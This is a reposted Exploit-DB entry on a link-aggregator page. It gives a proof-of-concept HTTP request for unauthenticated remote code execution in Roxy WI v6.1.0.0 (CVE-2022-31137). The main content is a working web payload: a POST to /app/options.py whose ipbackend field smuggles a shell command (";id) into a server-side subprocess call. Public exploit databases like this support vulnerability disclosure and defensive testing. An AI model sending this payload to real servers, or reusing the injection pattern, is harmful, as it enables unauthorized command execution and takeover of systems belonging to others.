4

[webapps] Roxy WI v6.1.0.0 - Unauthenticated Remote Code Execution (RCE) via sub...

 11 months ago
source link: https://www.exploit-db.com/exploits/51481
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.

Roxy WI v6.1.0.0 - Unauthenticated Remote Code Execution (RCE) via subprocess_execute

EDB-ID:

51481

EDB Verified:

Exploit:

  /  

Platform:

PHP

Date:

2023-05-24

Vulnerable App:

# Exploit Title: Roxy WI v6.1.0.0 - Unauthenticated Remote Code Execution (RCE) via subprocess_execute
# Exploit Author: Iyaad Luqman K
# Application: Roxy WI <= v6.1.0.0
# Vendor Homepage: https://roxy-wi.org
# Software Link: https://github.com/hap-wi/roxy-wi.git
# Tested on: Ubuntu 22.04
# CVE : CVE-2022-31137


# PoC
POST /app/options.py HTTP/1.1
Host: 192.168.1.44
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:101.0) Gecko/20100101 Firefox/101.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 136
Origin: https://192.168.1.44
Referer: https://192.168.1.44/app/login.py
Connection: close

show_versions=1&token=&alert_consumer=1&serv=127.0.0.1&getcertalert_consumer=1&serv=127.0.0.1&ipbackend=";id+##&backend_server=127.0.0.1

report

Recommend

About Joyk


Aggregate valuable and interesting links.
Joyk means Joy of geeK